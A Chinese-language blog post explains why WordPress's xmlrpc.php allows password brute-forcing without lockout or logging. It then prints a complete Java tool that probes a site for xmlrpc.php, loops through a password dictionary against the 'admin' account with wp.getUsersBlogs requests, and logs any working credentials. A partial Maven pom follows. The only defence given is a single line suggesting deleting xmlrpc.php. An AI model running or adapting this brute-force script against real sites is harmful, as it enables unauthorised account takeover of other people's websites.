Wordpress xmlrpc.php暴力破解漏洞

標籤：style   blog   http   color   java   使用   os   strong   

Wordpress xmlrpc.php暴力破解漏洞

wordpress是很流行的開源部落格，它提供遠程發布文章的方法，就是使用跟路徑的xmlrpc.php這個檔案，最近爆出xmlrpc漏洞，漏洞原理是通過xmlrpc進行認證，即使認證失敗，也不會被Wordpress安裝的安全外掛程式記錄，所以不會觸發密碼輸錯N次被鎖定的情況。因此就可能被暴力破解，如果密碼又是弱口令的話，就相當危險了。最簡單的解決辦法，就是刪除xmlrpc.php這個檔案。閑來無事，用java寫了暴力破解的指令碼，其實就是拿著各種使用者名稱、密碼去不斷調用xmlrpc.phpp這個檔案，檢測認證結果，很簡單。只為娛樂，暴力破解的事情，大家謹慎。

Xmlrpc.java源碼如下：

    package com.yeetrack.security.wordpress;    import org.apache.http.client.ClientProtocolException;    import org.apache.http.client.config.RequestConfig;    import org.apache.http.client.methods.CloseableHttpResponse;    import org.apache.http.client.methods.HttpGet;    import org.apache.http.client.methods.HttpPost;    import org.apache.http.entity.StringEntity;    import org.apache.http.impl.client.CloseableHttpClient;    import org.apache.http.impl.client.HttpClients;    import org.apache.http.util.EntityUtils;    import org.slf4j.Logger;    import org.slf4j.LoggerFactory;    import org.testng.annotations.Test;    import java.io.*;    /**     * Created by victor wang on 2014/8/2.     * 利用wordpress xmlrpc漏洞，暴力破解密碼     */    public class Xmlrpc    {        private String userAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0";        RequestConfig requestConfig = RequestConfig.custom().setConnectionRequestTimeout(4000).setConnectTimeout(4000)                .setSocketTimeout(4000).build();        private static Logger logger = LoggerFactory.getLogger(Xmlrpc.class);        private CloseableHttpClient httpClient = HttpClients.custom()                .setUserAgent(userAgent)                .setDefaultRequestConfig(requestConfig)                .build();        /**         * 校正網域名稱是否存在xmlrpc.php這個檔案         */        private boolean checkXmlRpcFile(String domain)        {            domain = wrapperUrl(domain);            if(domain==null)                return false;            HttpGet get = new HttpGet("http://"+domain+"/xmlrpc.php");            get.addHeader("User-Agent", userAgent);            CloseableHttpResponse response = null;            String resultString = null;            try {                response = httpClient.execute(get);                if(null == response || response.equals(""))                    return false;                resultString = EntityUtils.toString(response.getEntity());            } catch (IOException e) {                e.printStackTrace();            }            return resultString.contains("XML-RPC server accepts POST requests only.");        }        /**         * 暴力嘗試         */        private boolean forceLogin(String username, String password, String url)        {            //嘗試登入            HttpPost post = new HttpPost("http://"+wrapperUrl(url)+"/xmlrpc.php");            post.addHeader("User-Agent", userAgent);            String xmlString = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall>  <methodName>wp.getUsersBlogs</methodName>  <params>   <param><value>"+username+"</value></param>   <param><value>"+password+"</value></param>  </params></methodCall>";            StringEntity entity = null;            try {                entity = new StringEntity(xmlString);                post.setEntity(entity);                CloseableHttpResponse response = httpClient.execute(post);                String loginResult = EntityUtils.toString(response.getEntity());                if(null== loginResult || loginResult.equals(""))                    return false;                if(loginResult.contains("isAdmin")) {                    logger.info(url + "登入成功，userename--->" + username + "  password--->" + password);                    return true;                }            } catch (UnsupportedEncodingException e) {                e.printStackTrace();            } catch (ClientProtocolException e) {                e.printStackTrace();            } catch (IOException e) {                e.printStackTrace();            }            return false;        }        /**         * 淨化url，去掉http://或者末尾的path         */        private String wrapperUrl(String url)        {            if(null == url || url.equals(""))                return null;            if(url.startsWith("http://"))                url = url.substring(7);            if(url.contains("/"))                url = url.substring(0, url.indexOf("/"));            return url;        }        /**         * 破解         */        @Test        public void test()        {            String url = "http://somewordpress.com/xmlrpc.php";            if(!checkXmlRpcFile(url)) {                logger.info(url+"--->不存在xmlrpc漏洞");                return;            }            File file = new File("src/main/resources/1pass00.txt"); //密碼字典，這個網上一堆一堆的，或者自己產生也可            try {                FileReader fileReader = new FileReader(file);                BufferedReader bufferedReader = new BufferedReader(fileReader);                String line = null;                int count = 1;                while ((line = bufferedReader.readLine()) != null) {                    System.out.println("" + count + "  " + line);                    if(forceLogin("admin", line, url))                        break;                    count++;                    //Thread.sleep(500);                }            } catch (Exception e) { e.printStackTrace(); }        }    }

項目使用maven管理，使用了apache的httpclient和log4j，pom.xml代碼如下：

    <?xml version="1.0" encoding="UTF-8"?>    <project xmlns="http://maven.apache.org/POM/4.0.0"             xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"             xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">        <modelVersion>4.0.0</modelVersion>        <groupId>com.yeetrack.security</groupId>        <artifactId>wordpress-xmlrpc</artifactId>        <version>1.0-SNAPSHOT</version>

繼續閱讀-->